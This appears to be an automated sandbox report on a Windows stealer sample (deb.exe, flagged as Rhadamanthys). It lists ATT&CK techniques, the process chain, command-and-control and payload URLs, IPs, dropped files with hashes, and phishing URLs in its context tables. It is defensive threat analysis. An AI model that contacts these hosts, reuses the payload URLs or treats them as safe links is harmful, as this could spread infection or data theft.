                Source: Yara matchFile source: 00000012.00000002.2631620318.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                Windows Management Instrumentation                		1
                DLL Side-Loading                		112
                Process Injection                		111
                Masquerading                		31
                Input Capture                		1
                System Time Discovery                		Remote Services31
                Input Capture                		21
                Encrypted Channel                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts1
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Virtualization/Sandbox Evasion                		LSASS Memory331
                Security Software Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		1
                Non-Standard Port                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)112
                Process Injection                		Security Account Manager1
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Clipboard Data                		2
                Ingress Tool Transfer                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Deobfuscate/Decode Files or Information                		NTDS3
                Process Discovery                		Distributed Component Object ModelInput Capture2
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                Obfuscated Files or Information                		LSA Secrets3
                File and Directory Discovery                		SSHKeylogging3
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials116
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578118 Sample: deb.exe Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 51 ebitm.co.uk 2->51 53 dVxTXNLGomMFsmfMnuD.dVxTXNLGomMFsmfMnuD 2->53 61 Suricata IDS alerts for network traffic 2->61 63 Antivirus detection for URL or domain 2->63 65 Yara detected RHADAMANTHYS Stealer 2->65 67 2 other signatures 2->67 12 deb.exe 16 2->12         started        signatures3 process4 dnsIp5 57 ebitm.co.uk 185.199.220.71, 443, 49710 KRYSTALGR United Kingdom 12->57 49 C:\Users\user\AppData\...\downloaded_exe.exe, PE32 12->49 dropped 16 downloaded_exe.exe 33 12->16         started        20 conhost.exe 12->20         started        file6 process7 file8 45 C:\Users\user\AppData\Local\Temp\Del, COM 16->45 dropped 59 Multi AV Scanner detection for dropped file 16->59 22 cmd.exe 3 16->22         started        signatures9 process10 file11 47 C:\Users\user\AppData\Local\Temp\...\Flux.com, PE32 22->47 dropped 75 Drops PE files with a suspicious file extension 22->75 26 Flux.com 1 22->26         started        29 cmd.exe 2 22->29         started        31 conhost.exe 22->31         started        33 7 other processes 22->33 signatures12 process13 signatures14 77 Switches to a custom stack to bypass stack traces 26->77 35 svchost.exe 26->35         started        39 WerFault.exe 2 26->39         started        process15 dnsIp16 55 5.35.36.120, 49792, 7957 INF-NET-ASRU Russian Federation 35->55 69 System process connects to network (likely due to code injection or exploit) 35->69 71 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 35->71 73 Switches to a custom stack to bypass stack traces 35->73 41 fontdrvhost.exe 35->41         started        signatures17 process18 process19 43 WerFault.exe 23 16 41->43         started       

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                deb.exe0%ReversingLabs

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\542181\Flux.com0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\Del0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\downloaded_exe.exe25%ReversingLabsWin32.Trojan.Generic

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://ebitm.co.uk/salah/wp-includes/assets/ping.phpTEMP0%Avira URL Cloudsafe
                https://ebitm.co.uk/t0%Avira URL Cloudsafe
                https://ebitm.co.uk/d0%Avira URL Cloudsafe
                https://5.35.36.120:7957/457126a29df4c81310/0h5bjd37.h9so5x100%Avira URL Cloudmalware
                https://ebitm.co.uk/salah/wp-includes/assets/ping.phpY0%Avira URL Cloudsafe
                https://ebitm.co.uk/salah/wp-includes/assets/ping.php:N0%Avira URL Cloudsafe
                https://ebitm.co.uk/salah/wp-includes/assets/ping.php0%Avira URL Cloudsafe
                https://5.35.36.120:7957/457126a29df4c81310/0h5bjd37.h9so5kernelbasentdllkernel32GetProcessMitigatio100%Avira URL Cloudmalware
                https://5.35.36.120:7957/457126a29df4c81310/0h5bjd37.h9so5100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                ebitm.co.uk
                		185.199.220.71
                		truefalse
                  		unknown
                  dVxTXNLGomMFsmfMnuD.dVxTXNLGomMFsmfMnuD
                  		unknown
                  		unknownfalse
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://ebitm.co.uk/salah/wp-includes/assets/ping.phpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://gcc.gnu.org/bugs/):deb.exefalse
                      		high
                      https://5.35.36.120:7957/457126a29df4c81310/0h5bjd37.h9so5xsvchost.exe, 00000012.00000002.2631091896.000000000089C000.00000004.00000010.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      https://ebitm.co.uk/salah/wp-includes/assets/ping.php:Ndeb.exe, 00000000.00000002.2267682167.00000259909A8000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://ebitm.co.uk/tdeb.exe, 00000000.00000002.2267682167.0000025990A0D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://ebitm.co.uk/salah/wp-includes/assets/ping.phpYdeb.exe, 00000000.00000003.2255498764.0000025990A66000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://cloudflare-dns.com/dns-querysvchost.exe, 00000012.00000003.2563821039.0000000002D9F000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://upx.sf.netAmcache.hve.24.drfalse
                          		high
                          http://www.autoitscript.com/autoit3/XFlux.com, 0000000E.00000000.2310521086.0000000000965000.00000002.00000001.01000000.00000008.sdmp, Fo.4.dr, Flux.com.5.drfalse
                            		high
                            https://cloudflare-dns.com/dns-queryPOSTContent-TypeContent-LengthHostapplication/dns-message%dMachisvchost.exe, 00000012.00000003.2563821039.0000000002D9F000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://nsis.sf.net/NSIS_ErrorErrordownloaded_exe.exe, 00000004.00000000.2260239937.0000000000409000.00000002.00000001.01000000.00000006.sdmp, downloaded_exe.exe, 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmp, downloaded_exe.exe.0.drfalse
                                		high
                                https://5.35.36.120:7957/457126a29df4c81310/0h5bjd37.h9so5kernelbasentdllkernel32GetProcessMitigatiosvchost.exe, 00000012.00000002.2631500679.0000000002D0C000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000016.00000002.2718992288.000001479FB30000.00000040.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://5.35.36.120:7957/457126a29df4c81310/0h5bjd37.h9so5svchost.exe, 00000012.00000002.2631500679.0000000002D0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.2631091896.000000000089C000.00000004.00000010.00020000.00000000.sdmp, fontdrvhost.exe, fontdrvhost.exe, 00000016.00000002.2718992288.000001479FB30000.00000040.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://www.autoitscript.com/autoit3/Flux.com.5.dr, Billion.4.drfalse
                                  		high
                                  https://ebitm.co.uk/ddeb.exe, 00000000.00000002.2267682167.0000025990A0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://ebitm.co.uk/salah/wp-includes/assets/ping.phpTEMPdeb.exefalse
                                  • Avira URL Cloud: safe
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  185.199.220.71
                                  		ebitm.co.ukUnited Kingdom
                                  		12488KRYSTALGRfalse
                                  5.35.36.120
                                  		unknownRussian Federation
                                  		31514INF-NET-ASRUtrue

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1578118
                                  Start date and time:2024-12-19 09:28:11 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 7m 32s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:25
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:deb.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@31/29@2/2
                                  EGA Information:
                                  • Successful, ratio: 75%
                                  HCA Information:
                                  • Successful, ratio: 59%
                                  • Number of executed functions: 37
                                  • Number of non-executed functions: 155
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 20.189.173.22, 13.107.246.63, 172.202.163.200, 20.190.147.6
                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target svchost.exe, PID 6812 because there are no executed function
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • VT rate limit hit for: deb.exe

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  03:29:19API Interceptor1x Sleep call for process: downloaded_exe.exe modified
                                  03:29:23API Interceptor1x Sleep call for process: Flux.com modified
                                  03:30:03API Interceptor1x Sleep call for process: WerFault.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  No context

                                  Domains

                                  No context

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  KRYSTALGRhttps://go.skimresources.com/?id=129857X1500501&url=https://www.freelansssssssssssssssscer.com/users/login-quick.php?token=30b3628412ea618dcc3f414b266ae263302b3e1b43e6d2d885225319dabe8e68&url=https://secure.adnxs.com/seg?redir=https://link.sbstck.com/redirect/45834840-3c14-4374-8f51-bbcadebab762?j=eyJ1IjoiNGRnZ2x2In0Get hashmaliciousHTMLPhisherBrowse
                                  • 185.199.220.80
                                  http://www.artisteer.com/?p=affr&redirect_url=https://tdg.site4clientdemo.com/vendor/bin/hereme/43432/6467r/biddept@lakeshorelearning.comGet hashmaliciousHTMLPhisherBrowse
                                  • 185.199.220.80
                                  https://pub-8ffae7e163d64ee9b90d8cfcccbd4d95.r2.dev/autoloadmicrosoft.htmlGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                  • 185.199.220.62
                                  5CxmQXL0LD.exeGet hashmaliciousSystemBCBrowse
                                  • 185.199.220.75
                                  https://garfield-smith-technology-data-lawyers.mailchimpsites.com/manage/preferences?u=c1a66125f053aaa6f385b82e8&id=ac8e522263&e=f9e7e3ef3c&c=e6272aed0aGet hashmaliciousUnknownBrowse
                                  • 77.72.1.45
                                  https://www.aspcp.ukGet hashmaliciousUnknownBrowse
                                  • 185.199.220.70
                                  http://belle-group.atGet hashmaliciousUnknownBrowse
                                  • 185.199.220.93
                                  https://googleweblight.com/i?u=https://hizoom.co.uk/wp-admin/js/hereme/46343/8473r/YXN0cmlkLnd1cnN0ZXJAaWxlZGVmcmFuY2UuZnI=&domain=iledefrance.frGet hashmaliciousHTMLPhisherBrowse
                                  • 185.199.220.80
                                  https://hizoom.co.uk/wp-admin/js/hereme/46343/8473r/YXN0cmlkLnd1cnN0ZXJAaWxlZGVmcmFuY2UuZnI=Get hashmaliciousHTMLPhisherBrowse
                                  • 185.199.220.80
                                  https://avisfordparkhotel.com/Get hashmaliciousUnknownBrowse
                                  • 185.53.58.58
                                  INF-NET-ASRUx86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                  • 89.169.180.216
                                  Space.mpsl.elfGet hashmaliciousMiraiBrowse
                                  • 89.169.4.44
                                  Space.ppc.elfGet hashmaliciousMiraiBrowse
                                  • 89.169.4.44
                                  Space.arm7.elfGet hashmaliciousMiraiBrowse
                                  • 89.169.4.44
                                  Space.i686.elfGet hashmaliciousMiraiBrowse
                                  • 89.169.4.44
                                  Space.m68k.elfGet hashmaliciousMiraiBrowse
                                  • 89.169.4.44
                                  Space.spc.elfGet hashmaliciousMiraiBrowse
                                  • 89.169.4.44
                                  Space.x86_64.elfGet hashmaliciousMiraiBrowse
                                  • 89.169.4.44
                                  Space.mips.elfGet hashmaliciousMiraiBrowse
                                  • 89.169.4.44
                                  Space.x86.elfGet hashmaliciousMiraiBrowse
                                  • 89.169.4.44

                                  JA3 Fingerprints

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  37f463bf4616ecd445d4a1937da06e19iviewers.dllGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                  • 185.199.220.71
                                  script.ps1Get hashmaliciousCredGrabber, Meduza StealerBrowse
                                  • 185.199.220.71
                                  66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                  • 185.199.220.71
                                  pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                  • 185.199.220.71
                                  script.htaGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                  • 185.199.220.71
                                  Brooming.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                  • 185.199.220.71
                                  TT copy.jsGet hashmaliciousFormBookBrowse
                                  • 185.199.220.71
                                  TUp6f2knn2.exeGet hashmaliciousLummaCBrowse
                                  • 185.199.220.71
                                  QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                  • 185.199.220.71
                                  R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                  • 185.199.220.71

                                  Dropped Files

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  C:\Users\user\AppData\Local\Temp\542181\Flux.compM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                    QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                      'Setup.exeGet hashmaliciousLummaC StealerBrowse
                                        CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                          CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                            Setup.msiGet hashmaliciousVidarBrowse
                                              69633f.msiGet hashmaliciousVidarBrowse
                                                fm2r286nqT.exeGet hashmaliciousLummaCBrowse
                                                  nB52P46OJD.exeGet hashmaliciousVidarBrowse
                                                    lem.exeGet hashmaliciousVidarBrowse

                                                      Created / dropped Files

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_fontdrvhost.exe_d32c824e8915b30da4efd4eabd13e74e4ef8c1_ad0be647_aa95fc01-8a65-4ed4-b151-ed29dedd147c\Report.wer

                                                      Download File
                                                      Process:C:\Windows\System32\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.6600287137524228
                                                      Encrypted:false
                                                      SSDEEP:96:OHFrm3e1MqigKJAs3Wrk41yHpHS2QXIDcQkc6tcEycw3ZUtzJzQ+HbHgrZ2ZAX/S:kkZHnAxR0apYKjqzuiF3Z24lO8JO
                                                      MD5:68DA6AA697D6620FA76F4E61B2B049C0
                                                      SHA1:E2EFE3C31B0F6978C42A7821C64B23E87509888C
                                                      SHA-256:BB49A2C8B95BC3625104AE79711CDE0B023E5E152892EF8A9360840C28BA2575
                                                      SHA-512:7424F34125A23B64E41B5898617A5B404FC8EEDDF8BCA0788ACBF1D513EAC1622A7EFEC2C03DA33984C3C5D59E41F4FF969FD97593779C7F4FAB2F2AC6D2BC45
                                                      Malicious:false
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.0.7.0.5.9.7.9.2.8.6.1.5.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.0.7.0.5.9.8.6.9.4.2.4.5.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.a.9.5.f.c.0.1.-.8.a.6.5.-.4.e.d.4.-.b.1.5.1.-.e.d.2.9.d.e.d.d.1.4.7.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.1.b.0.f.f.3.e.-.4.8.1.d.-.4.5.8.d.-.b.e.4.3.-.a.b.7.4.4.4.5.5.f.0.6.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.f.o.n.t.d.r.v.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.f.o.n.t.d.r.v.h.o.s.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.6.4.-.0.0.0.1.-.0.0.1.5.-.1.0.e.5.-.3.4.2.e.f.0.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.5.e.f.b.3.f.9.7.3.4.2.b.a.1.9.5.4.2.4.1.3.4.f.2.8.f.9.7.7.d.a.9.e.0.d.6.a.a.9.1.!.f.o.n.t.d.r.v.h.o.

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER146C.tmp.dmp

                                                      Download File
                                                      Process:C:\Windows\System32\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Thu Dec 19 08:29:57 2024, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):45718
                                                      Entropy (8bit):1.3154979335161952
                                                      Encrypted:false
                                                      SSDEEP:96:5P8IjfRdn9Hy0K4I7i7c/+riE1mQP/NClPnyOf51WIKLDIgUFhK:qS59DeOc/+riPQ9ClPnyOf5SdUi
                                                      MD5:1E782DD1765B3B43A2BC720F34B64CEA
                                                      SHA1:525F28B82C98591942DF97E10C33B6CEB41258E5
                                                      SHA-256:8625C0322C2DB6BCB4953125FA5FACD85B47105634A34E40824914D47D33DFB4
                                                      SHA-512:036BCF289FC07249351E1D3B08E5DACF94D7A285DC8319BFF63CABDDF3EC25DF4B8D5AC84B924FDF67C4CE6C99E151AD7BEACE2EA343B396E611A3C42847B3FA
                                                      Malicious:false
                                                      Preview:MDMP..a..... .........cg........................................2!..........T.......8...........T......................................................................................................................eJ..............Lw......................T.......d.....cg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER14AC.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\System32\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8622
                                                      Entropy (8bit):3.6886862339042676
                                                      Encrypted:false
                                                      SSDEEP:192:R6l7wVeJYALbjLUe6YOb7G1gmfr57vEpDw89bboAf0MJm:R6lXJnF6YS7G1gmfrFvEbvfy
                                                      MD5:2469094F3850AC0F44ED2FA4E64A1377
                                                      SHA1:A4F197E2C2EEAE01C6EAFA1596FAB30F5EAD9A47
                                                      SHA-256:05367053D177F93865661593DFD740A01C39B6265555781658FEF072811223C2
                                                      SHA-512:C4F0477A9D34026F5F4E6ECD9F5BE9B79285D5E20034CEEF3FCECD49DCD719E14BB76DD9E216639FA6EDFCE4E39CA1CE711C0BD6679B84EDC912C6575FD41AA8
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.1.9.6.<./.P.i.

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER1568.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\System32\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4853
                                                      Entropy (8bit):4.442118711784656
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwWl8zstJg771I9dAZXVVWpW8VYkbYm8M4Jk5LvM6FNzyq8vU5LvMuZaMueFd:uIjfHI7NpW7V8JcjMkzWsjMuZ1uUd
                                                      MD5:69E0767E6319BD382D28F3ECC316ED15
                                                      SHA1:1C0A152BE77DFB75ACFBCFD178D19EBF038FB677
                                                      SHA-256:AC873B0827CE41F15BF62778CF4687A5A07664B87AA0805A4FF091A0FEECDCE8
                                                      SHA-512:C4FED570B4C106E8D416C5E586429D3AF2154A47D218FEF924A0A6F0C8B5FA2B983A63CF49AB23F900B25A5C5B1E61D3F116EC88CBDACA9200388BE1CDBAF82B
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="637892" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ping[1].php

                                                      Download File
                                                      Process:C:\Users\user\Desktop\deb.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):1735416
                                                      Entropy (8bit):5.992605444519626
                                                      Encrypted:false
                                                      SSDEEP:24576:5dGc84aalD0Vc7JlMd9U1/pGY5W6ZVhuIPyGB5OkqOreAU4HSd/Z3YG6gPxo4ZCI:5Tno92GQvuIZRfobW1I
                                                      MD5:5DA661176D59BCDCA53728ABCC59E36E
                                                      SHA1:FD08BB31AB7A5022A6D9B88F1A158B9BCD5C06B3
                                                      SHA-256:49E2EE5A0309F25AC8D991F899DAEF585E125C2B95D9B04D55B9CD7E7EEF4978
                                                      SHA-512:B522A6D161E2B4F486C28EBFF7828A6C6B873335034DD121EDCCE47A71949BA7B678C4CAAAEBC60479E6DAE8914C70F2910791511344BF072CDD6B0A6CC0F1D3
                                                      Malicious:false
                                                      Preview:TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABBe9FrBRq/OAUavzgFGr84DGI8OAYavzgMYiw4FBq/OAUavjipGr84HocVOAkavzgehyU4BBq/OB6HIjgEGr84UmljaAUavzgAAAAAAAAAAFBFAABMAQYA5OJHTwAAAAAAAAAA4AACAQsBCgAAdAAAAPYHAABCAACvOAAAABAAAACQAAAAAEAAABAAAAACAAAFAAAABgAAAAUAAAAAAAAAAKAQAAAEAACHqBMAAgBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAQKwAALQAAAAAABAAAoUAAAAAAAAAAAAAUqITAOg5AAAAYAgAlAkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACQAADQAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAACMcgAAABAAAAB0AAAABAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAAbisAAACQAAAALAAAAHgAAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAJwrBwAAwAAAAAIAAACkAAAAAAAAAAAAAAAAAABAAADALm5kYXRhAAAAEAgAAPAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAwC5yc3JjAAAAAoUAAAAAEAAAhgAAAKYAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAANYPAAAAkBAAABAAAAA0AQAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                      C:\Users\user\AppData\Local\Temp\542181\Flux.com

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:modified
                                                      Size (bytes):947288
                                                      Entropy (8bit):6.630612696399572
                                                      Encrypted:false
                                                      SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                      MD5:62D09F076E6E0240548C2F837536A46A
                                                      SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                      SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
